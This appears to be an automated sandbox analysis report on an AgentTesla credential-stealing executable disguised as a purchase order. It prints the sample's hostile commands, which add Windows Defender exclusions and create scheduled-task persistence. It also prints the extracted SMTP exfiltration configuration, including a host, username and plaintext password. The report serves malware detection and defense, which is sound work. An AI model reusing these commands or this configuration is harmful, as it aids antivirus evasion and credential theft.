Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
purchase order - PO-011024-201.exe

Overview

General Information

Sample name:purchase order - PO-011024-201.exe
Analysis ID:1465995
MD5:62b9604ff6ce5a82d5270041dcd2f3fe
SHA1:880c5ce3bb2f391b8fa2ff5764ed0dc905c3a9e6
SHA256:e3308f1dd36bd61758447d5c6eb6e90adabc65e1119bbbe78537c3e3b622835c
Tags:AgentTeslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
.NET source code contains very large array initializations
.NET source code contains very large strings
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores large binary data to the registry
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • purchase order - PO-011024-201.exe (PID: 7644 cmdline: "C:\Users\user\Desktop\purchase order - PO-011024-201.exe" MD5: 62B9604FF6CE5A82D5270041DCD2F3FE)
    • powershell.exe (PID: 7856 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\purchase order - PO-011024-201.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7908 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jDCErdK.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 3068 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7936 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jDCErdK" /XML "C:\Users\user\AppData\Local\Temp\tmpA55D.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 8136 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • WMIADAP.exe (PID: 7936 cmdline: wmiadap.exe /F /T /R MD5: 1BFFABBD200C850E6346820E92B915DC)
  • jDCErdK.exe (PID: 7392 cmdline: C:\Users\user\AppData\Roaming\jDCErdK.exe MD5: 62B9604FF6CE5A82D5270041DCD2F3FE)
    • schtasks.exe (PID: 7944 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jDCErdK" /XML "C:\Users\user\AppData\Local\Temp\tmp981A.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7988 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "25", "Host": "mail.iaa-airferight.com", "Username": "mail@iaa-airferight.com", "Password": "Asaprocky11"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.4107833892.000000000284C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000008.00000002.1781239060.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000008.00000002.1781239060.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000008.00000002.1781239060.0000000002F0B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000008.00000002.1779040921.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 16 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            9.2.jDCErdK.exe.3da9108.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              9.2.jDCErdK.exe.3da9108.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                9.2.jDCErdK.exe.3da9108.1.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x316f7:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x31769:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x317f3:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x31885:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x318ef:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x31961:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x319f7:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x31a87:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                9.2.jDCErdK.exe.3de3b28.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  9.2.jDCErdK.exe.3de3b28.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    Click to see the 26 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\purchase order - PO-011024-201.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\purchase order - PO-011024-201.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\purchase order - PO-011024-201.exe", ParentImage: C:\Users\user\Desktop\purchase order - PO-011024-201.exe, ParentProcessId: 7644, ParentProcessName: purchase order - PO-011024-201.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\purchase order - PO-011024-201.exe", ProcessId: 7856, ProcessName: powershell.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\purchase order - PO-011024-201.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\purchase order - PO-011024-201.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\purchase order - PO-011024-201.exe", ParentImage: C:\Users\user\Desktop\purchase order - PO-011024-201.exe, ParentProcessId: 7644, ParentProcessName: purchase order - PO-011024-201.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\purchase order - PO-011024-201.exe", ProcessId: 7856, ProcessName: powershell.exe
                    Sigma detected: Suspicious Add Scheduled Task Parent
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jDCErdK" /XML "C:\Users\user\AppData\Local\Temp\tmp981A.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jDCErdK" /XML "C:\Users\user\AppData\Local\Temp\tmp981A.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\jDCErdK.exe, ParentImage: C:\Users\user\AppData\Roaming\jDCErdK.exe, ParentProcessId: 7392, ParentProcessName: jDCErdK.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jDCErdK" /XML "C:\Users\user\AppData\Local\Temp\tmp981A.tmp", ProcessId: 7944, ProcessName: schtasks.exe
                    Sigma detected: Suspicious Outbound SMTP Connections
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 46.175.148.58, DestinationIsIpv6: false, DestinationPort: 25, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 8136, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49736
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jDCErdK" /XML "C:\Users\user\AppData\Local\Temp\tmpA55D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jDCErdK" /XML "C:\Users\user\AppData\Local\Temp\tmpA55D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\purchase order - PO-011024-201.exe", ParentImage: C:\Users\user\Desktop\purchase order - PO-011024-201.exe, ParentProcessId: 7644, ParentProcessName: purchase order - PO-011024-201.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jDCErdK" /XML "C:\Users\user\AppData\Local\Temp\tmpA55D.tmp", ProcessId: 7936, ProcessName: schtasks.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\purchase order - PO-011024-201.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\purchase order - PO-011024-201.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\purchase order - PO-011024-201.exe", ParentImage: C:\Users\user\Desktop\purchase order - PO-011024-201.exe, ParentProcessId: 7644, ParentProcessName: purchase order - PO-011024-201.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\purchase order - PO-011024-201.exe", ProcessId: 7856, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Scheduled temp file as task from temp location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jDCErdK" /XML "C:\Users\user\AppData\Local\Temp\tmpA55D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jDCErdK" /XML "C:\Users\user\AppData\Local\Temp\tmpA55D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\purchase order - PO-011024-201.exe", ParentImage: C:\Users\user\Desktop\purchase order - PO-011024-201.exe, ParentProcessId: 7644, ParentProcessName: purchase order - PO-011024-201.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jDCErdK" /XML "C:\Users\user\AppData\Local\Temp\tmpA55D.tmp", ProcessId: 7936, ProcessName: schtasks.exe

                    Snort Signatures

                    No Snort rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for URL or domain
                    Source: http://mail.iaa-airferight.comAvira URL Cloud: Label: malware
                    Found malware configuration
                    Source: 9.2.jDCErdK.exe.3de3b28.2.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "25", "Host": "mail.iaa-airferight.com", "Username": "mail@iaa-airferight.com", "Password": "Asaprocky11"}
                    Multi AV Scanner detection for domain / URL
                    Source: mail.iaa-airferight.comVirustotal: Detection: 8%Perma Link
                    Source: http://mail.iaa-airferight.comVirustotal: Detection: 8%Perma Link
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeReversingLabs: Detection: 31%
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeVirustotal: Detection: 35%Perma Link
                    Multi AV Scanner detection for submitted file
                    Source: purchase order - PO-011024-201.exeReversingLabs: Detection: 31%
                    Source: purchase order - PO-011024-201.exeVirustotal: Detection: 35%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: purchase order - PO-011024-201.exeJoe Sandbox ML: detected
                    Source: purchase order - PO-011024-201.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49734 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49737 version: TLS 1.2
                    Source: purchase order - PO-011024-201.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: GVAj.pdbSHA256 source: purchase order - PO-011024-201.exe, jDCErdK.exe.0.dr
                    Source: Binary string: GVAj.pdb source: purchase order - PO-011024-201.exe, jDCErdK.exe.0.dr

                    Networking

                    barindex
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 9.2.jDCErdK.exe.3de3b28.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.purchase order - PO-011024-201.exe.40782a8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.jDCErdK.exe.3da9108.1.raw.unpack, type: UNPACKEDPE
                    Source: Joe Sandbox ViewIP Address: 46.175.148.58 46.175.148.58
                    Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
                    Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
                    Source: Joe Sandbox ViewASN Name: ASLAGIDKOM-NETUA ASLAGIDKOM-NETUA
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: global trafficTCP traffic: 192.168.2.4:49736 -> 46.175.148.58:25
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                    Source: global trafficDNS traffic detected: DNS query: mail.iaa-airferight.com
                    Source: RegSvcs.exe, 00000008.00000002.1781239060.0000000002F0B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4107833892.000000000284C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.iaa-airferight.com
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1693602582.00000000025A0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1781239060.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, jDCErdK.exe, 00000009.00000002.1782894037.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4107833892.00000000027DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp, purchase order - PO-011024-201.exe, 00000000.00000002.1720142571.0000000004F30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1695549066.0000000003FF1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1779040921.0000000000402000.00000040.00000400.00020000.00000000.sdmp, jDCErdK.exe, 00000009.00000002.1786573650.0000000003DA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1695549066.0000000003FF1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1779040921.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1781239060.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, jDCErdK.exe, 00000009.00000002.1786573650.0000000003DA9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4107833892.00000000027DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: RegSvcs.exe, 00000008.00000002.1781239060.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4107833892.00000000027DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: RegSvcs.exe, 00000008.00000002.1781239060.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4107833892.00000000027DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49734 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49737 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.raw.unpack, abAX9N.cs.Net Code: BFeixnEv
                    Source: 0.2.purchase order - PO-011024-201.exe.40782a8.5.raw.unpack, abAX9N.cs.Net Code: BFeixnEv
                    Source: 9.2.jDCErdK.exe.3de3b28.2.raw.unpack, abAX9N.cs.Net Code: BFeixnEv
                    Installs a global keyboard hook
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow created: window name: CLIPBRDWNDCLASS

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 9.2.jDCErdK.exe.3da9108.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 9.2.jDCErdK.exe.3de3b28.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.purchase order - PO-011024-201.exe.40782a8.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 9.2.jDCErdK.exe.3de3b28.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.purchase order - PO-011024-201.exe.40782a8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 9.2.jDCErdK.exe.3da9108.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    .NET source code contains very large array initializations
